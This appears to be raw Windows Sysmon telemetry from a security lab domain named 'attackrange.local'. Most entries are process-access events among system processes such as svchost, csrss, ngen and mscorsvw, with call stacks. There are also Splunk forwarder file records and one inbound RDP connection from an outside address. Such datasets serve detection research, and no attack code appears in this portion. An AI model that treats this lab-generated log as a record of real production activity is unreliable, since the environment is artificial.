14:58:36.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-840E-00000000BB01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050561Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:37.138{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E27FBA4C353020F7A060845323B05389,SHA256=77B352C1F845169AC3D9FD00E48832CFF3849203721E30BD8AF819037269305E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.919{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1E-607E-990E-00000000BB01}5420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.919{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1E-607E-990E-00000000BB01}5420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1E-607E-990E-00000000BB01}5420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1E-607E-980E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.810{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1E-607E-980E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.810{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1E-607E-980E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.466{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1E-607E-970E-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.466{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1E-607E-970E-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.466{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1E-607E-970E-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.294{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=572F9038A8438B1A38709B2FE9268645,SHA256=FD6273E63208B0E3DE6E4C6DA6D7D5934043663FD98294780C7352D5CCA25CB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.257{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30835-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.154{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1E-607E-960E-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.154{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1E-607E-960E-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.154{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1E-607E-960E-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.107{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1E-607E-950E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.107{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1E-607E-950E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.107{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1E-607E-950E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-940E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.997{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-940E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000050562Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:38.154{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5306F1FF48153A3642A6E24DEDA18580,SHA256=7CB8A70567DEAE2879B0784B581BEF64567CC0B488293C9E8D572745E684374F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43483520C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 